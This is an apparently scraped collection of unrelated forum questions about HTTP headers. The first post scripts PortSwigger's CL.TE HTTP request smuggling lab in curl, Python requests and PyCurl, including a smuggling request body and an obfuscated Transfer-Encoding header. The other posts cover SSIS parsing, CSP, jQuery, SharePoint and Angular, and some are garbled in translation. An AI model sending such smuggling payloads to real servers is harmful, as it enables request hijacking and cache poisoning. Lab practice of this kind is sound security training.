curl – Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 10
Transfer-Encoding: chunked

0

G 

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $'POST' 
    -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' 
    --data-binary $'0x0dx0ax0dx0aGx0dx0ax0dx0a' 
    $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}

    data = '0x0dx0ax0dx0aGx0dx0a'

    s = requests.Session()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)

    print(response.request.headers)
    print(response.status_code)
    print(response.text)

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X(n)Transfer-Encoding: chunked

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python

import pycurl
from StringIO import StringIO

buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0x0dx0ax0dx0aGx0dx0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, (
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
    ))
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()

body = buffer.getvalue()

print(body)

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying 18.200.141.238:443...                                                                                                                            
* TCP_NODELAY set                                                                                                                                           
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                     
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification OK
*        server certificate status verification SKIPPED
*        common name: web-security-academy.net (matched)
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=web-security-academy.net
*        start date: Fri, 05 Jul 2019 00:00:00 GMT
*        expire date: Wed, 05 Aug 2020 12:00:00 GMT
*        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
< 
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23

"Internal Server Error"

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

sql server – SSIS 2017 – Parse flat file with multiple columns and headers on multiple lines

I receive a daily CSV file containing more than 600 company employee positions, each of which has the following format:

Position,Description
SUP1015,Shipping Supervisor Day
Work UOM:,Hours,Active:,Yes,Permanent:,Yes,,
Default Rate Level:,0,Default Rate Source:,Master,Default GL Source:,Master,,
Effective Date:,,Expiry Date:,,Created Date:,29-Apr-2014,Revised Date:,06-Jun-2019
Job Class:,,,,,Location:,,1004 - Shipping,,
Union Code:,,,,,Reports To:,,MGR1056 - Delivery & Shipping Manager,,
Position FTE:,,1.0000,,,,,,

My goal is to transform all over 600 records into a single table:

Position | Description                     | Work UOM | Active | Permanent | Default Rate Level | Default Rate Source | Default GL Code | Effective Date | Expiry Date | Created Date | Revised Date | Job Class | Location                 | Union Code | Reports to                                    | Position FTE |
=========================================================================================================================================================================================================================================================================================================================
SUP1015  | Shipping Supervisor Day         | Hours    | Yes    | Yes       | 0                  | Master              | Master          |                |             | 29-Apr-2014  | 06-Jun-2019  |           | 1004 - Shipping          |            | MGR1056 - Delivery & Shipping Manager         | 1.0000       |

I have no idea how to parse this, given the connection managers in SSIS. Any help and guidance is greatly appreciated.

8 – How to configure headers in API REST endpoints for GET method?

I am writing Rest api endpoint for GET method and testing the same in postman client. By default, there is no header for the encoding technique called utf-8. I want to send it in response headers manually. So I tried like below:

$response = new ResourceResponse($newsfeed, 200);
$response->headers->set('charset', 'utf-8');

After this I got this in postman headers like:Charset: utf-8.

I wonder if this is the right way to configure it or is there an efficient alternative way to handle it? Can someone help me with this?

http headers: Chrome gives a content security policy warning when viewing an image in its own tab on my site

I am configuring Content-Security-Policy in htaccess.

I use a fairly basic and strict policy:

Header always set Content-Security-Policy
"default-src 'self';
script-src 'self' http: https: *.googleapis.com *.google-analytics.com;
style-src 'self';
img-src 'self' http: https: *.google-analytics.com;
frame-src 'none'"
It works fine for the website.

But if I right click on an image on my website and "open image in new tab" in Chrome, I get this error in the console:

"You refused to apply the style online because it violates the following Content Security Policy directive:" style-src & # 39; self & # 39; The keyword 'insecure online' is required, a hash or a nonce to allow online execution. "

This seems to be caused by the browser (Chrome) which adds inline style to the images.

The image is displayed, but the black background is now white (default). Maybe another style too, I don't know

How I can avoid this? Or does it not matter at all?

I don't want to set a flexible policy just for the behavior of Chrome as that would defeat its purpose.

javascript: extract headers from inside a div container and create ul list

I have an html here, and the jquery code extracts the headers from the .p_table_section container and displays a list, what I hope to accomplish is to extract headers from the div.p_table_section container and create a separate ul list

which means that each .p_table_section container will show a new list, the current code I have just shows everything in one list

Please see my violin here https://jsfiddle.net/chwaj745/

Heading 1

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

1 product 1-a

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

2 product 1-b

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

3 product 1-c

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

Heading 1

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

1 product 2-a

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

2 product 2-b

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum augue quam.

and here is the jquery code to display the table of contents

jQuery(function() {
    var regex = /(^a-zA-Z-)/g;

    var ToC =
      "
    "; var newLine, el, title, link; jQuery(".p_table_section h2.product_table_heading, .p_table_section h3.post-product-table_title").each(function() { el = jQuery(this); title = el.text(); link = "#" + el.text().toLowerCase().replace(regex, "-"); jQuery(this).attr('id', title.toLowerCase().replace(regex, "-")); if (jQuery(this).closest("h2.product_table_heading").length) { newLine = "
  • " + "" + title + "" + "
  • "; } else { newLine = "
  • " + "" + title + "" + "
  • "; } ToC += newLine; }); ToC += "
"; jQuery(".toc").prepend(ToC); });

2013 – SharePoint StickyHeaders List – How do I change the relative position of the headers from the top of the page?

After spending quite a bit of time solving issues with the StickyHeaders script (How to make a custom list have floating / fixed headers), I finally got it working (awesome!) … important detail was missing from the & # 39; response & # 39 ;: The content editor calling the jquery and StickyHeaders scripts had to be placed AFTER the SharePoint List View (2013) web parts on my page.

Now to my question … I have custom HTML in another web part that puts a link index at the top of the page in a fixed position using CSS (-95px from above; in meetings we enlarge the SharePoint page to full screen and the table appears very well at the top). When I scroll down the page, StickyHeaders appear above my link table. Does anyone know where / how in the StickyHeaders js file can I adjust the fixed position where the header appears so that it shows below my table?

Full Js for StickyHeaders available here: http://spoodoo.com/downloads/

I suspect the part of the code that I need to modify is in the following code section, but I just don't know what to change …

var style = ".stickyHeader {" +
                        "border: 1px solid grey;" +
                        "background-color: white;" +
                        "box-shadow: 0 0 6px -2px black;" +
                        "z-index: 1;" +
                    "}" +
                    ".stickyHeader > th {" +
                        "position: relative;" +
                    "}" +
                    ".ms-listviewtable th .ms-core-menu-box {" +
                        "top: auto !important;" +
                        "left: auto !important;" +
                    "}" +
                    ".stickyHeader th:not((id^=spgridcontainer)) {" +
                        "border-bottom: 0 !important;" +
                    "}" +
                    ".ms-listviewtable.addPadding {" +
                        "padding-right: 26px !important;" +
                    "}";
        var div = jQuery("
", { html: "­" }).appendTo("body");

Some screenshots:

1) On page load …
When the page loads

2) Fixed header in normal view (the header is above the table, I want it below):
The header appears above the link table

3) In expanded view (called "content focus"), it looks great … I also want it to appear this way in normal view.
The enlarged view ("focus on content") looks good

web development: why does Chrome show 304 in the Response Headers section but 200 in the status code?

Why does Chrome show 304 on Response headings section but 200 in Status code? Why doesn't it show 304 in the status code (by the way, that's NOT 200 memory cache)?

If it shows 200, I can't know it's actually 304 without looking at the request details.

Compared to Firefox (same request), 304 in status code.

ionic – get data from Angular headers

I have this service for the authentication of a user.

loginuser(email: string, password: string): Observable {
let headers: HttpHeaders = new HttpHeaders();                   
headers = headers.append('Accept', 'application/json');
headers = headers.append('Access-Control-Allow-Origin', "*");
headers = headers.append('Access-Control-Allow-Headers', "Access-Token, Client");
headers = headers.append('Access-Control-Expose-Headers', "Access-Token, Client");



const url_api = "api...../v1/auth/sign_in";
return this.htttp
  .post(
    url_api,
    { email, password },
    {headers: headers}
  )
  .pipe(
    tap(result => {
      console.log(result);
    })
  );
 }

After doing the POST, the server returns the following headers to me.
enter the image description here

From that I need to get the Access-Token and the Client like so:
enter the image description here

I have tried what is shown here but it has not worked for me, it returns NULL: LINK ANSWER STACKOVERFLOW

Help CORS problem, axios – Headers problem